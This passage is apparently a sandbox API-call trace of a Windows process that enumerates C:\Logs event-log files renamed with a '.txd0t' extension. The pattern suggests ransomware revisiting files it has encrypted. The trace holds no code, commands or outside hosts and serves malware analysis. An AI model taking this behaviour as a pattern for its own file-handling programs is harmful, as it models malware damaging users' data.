psz1="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t" [0128.934] PathFindExtensionW (pszPath="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t") returned=".txd0t" [0128.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.934] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3f9672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", cAlternateFileName="MI8FB9~1.TXD")) returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.934] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.934] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.934] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t" [0128.934] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t") returned=".txd0t" [0128.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.934] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a445aea, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", cAlternateFileName="MI4A13~1.TXD")) returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", psz2=".") returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", psz2="..") returned 1 [0128.934] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.934] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.934] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t" [0128.934] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t") returned=".txd0t" [0128.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.934] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a576e49, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", cAlternateFileName="MI2C6F~1.TXD")) returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", psz2=".") returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", psz2="..") returned 1 [0128.934] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.934] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.934] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t" [0128.934] PathFindExtensionW (pszPath="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t") returned=".txd0t" [0128.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.935] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a4de83f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", cAlternateFileName="MI4E0B~1.TXD")) returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.935] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.935] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.935] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t" [0128.935] PathFindExtensionW (pszPath="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t") returned=".txd0t" [0128.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.935] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a4de83f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", cAlternateFileName="MI876D~1.TXD")) returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.935] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.935] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.935] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t" [0128.935] PathFindExtensionW (pszPath="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t") returned=".txd0t" [0128.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.935] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a59d09b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", cAlternateFileName="MI6A57~1.TXD")) returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", psz2=".") returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", psz2="..") returned 1 [0128.935] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.935] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.935] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t" [0128.935] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t") returned=".txd0t" [0128.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.935] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5046ef, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", cAlternateFileName="MID58F~1.TXD")) returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.935] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.935] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.935] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t" [0128.935] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t") returned=".txd0t" [0128.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.935] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5046ef, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", cAlternateFileName="MI52C3~1.TXD")) returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", psz2=".") returned 1 [0128.935] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", psz2="..") returned 1 [0128.936] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.936] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.936] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t" [0128.936] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t") returned=".txd0t" [0128.936] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.936] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a576e49, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", cAlternateFileName="MI4E93~1.TXD")) returned 1 [0128.936] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.936] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.936] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.936] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.936] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t" [0128.936] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t") returned=".txd0t" [0128.936] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.936] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a52a96d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", cAlternateFileName="MICD59~1.TXD")) returned 1 [0128.936] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", psz2=".") returned 1 [0128.936] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", psz2="..") returned 1 [0128.937] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t" [0128.937] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t") returned=".txd0t" [0128.937] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.937] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a65bbe9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", cAlternateFileName="MI6974~1.TXD")) returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.937] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t" [0128.937] PathFindExtensionW (pszPath="Microsoft-Windows-SMBClient%4Operational.evtx.txd0t") returned=".txd0t" [0128.937] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.937] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a59d09b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", cAlternateFileName="MIE488~1.TXD")) returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", psz2=".") returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", psz2="..") returned 1 [0128.937] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Security.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.txd0t" [0128.937] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Security.evtx.txd0t") returned=".txd0t" [0128.937] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.937] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5c32e4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", cAlternateFileName="MIF807~1.TXD")) returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", psz2=".") returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", psz2="..") returned 1 [0128.937] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t" [0128.937] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Audit.evtx.txd0t") returned=".txd0t" [0128.937] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.937] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5c32e4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", cAlternateFileName="MIB739~1.TXD")) returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", psz2=".") returned 1 [0128.937] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", psz2="..") returned 1 [0128.937] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t" [0128.938] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Connectivity.evtx.txd0t") returned=".txd0t" [0128.938] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.938] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a71a93d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", cAlternateFileName="MI2FCD~1.TXD")) returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.938] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.938] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.938] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t" [0128.938] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Operational.evtx.txd0t") returned=".txd0t" [0128.938] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.938] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a71a93d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", cAlternateFileName="MIC863~1.TXD")) returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", psz2=".") returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", psz2="..") returned 1 [0128.938] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.938] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.938] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Security.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t" [0128.938] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Security.evtx.txd0t") returned=".txd0t" [0128.938] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.938] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a60f77d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Store%4Operational.evtx.txd0t", cAlternateFileName="MIEA4D~1.TXD")) returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.938] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.938] StrNCatW (in: psz1="C:\\Logs", psz2="\\", 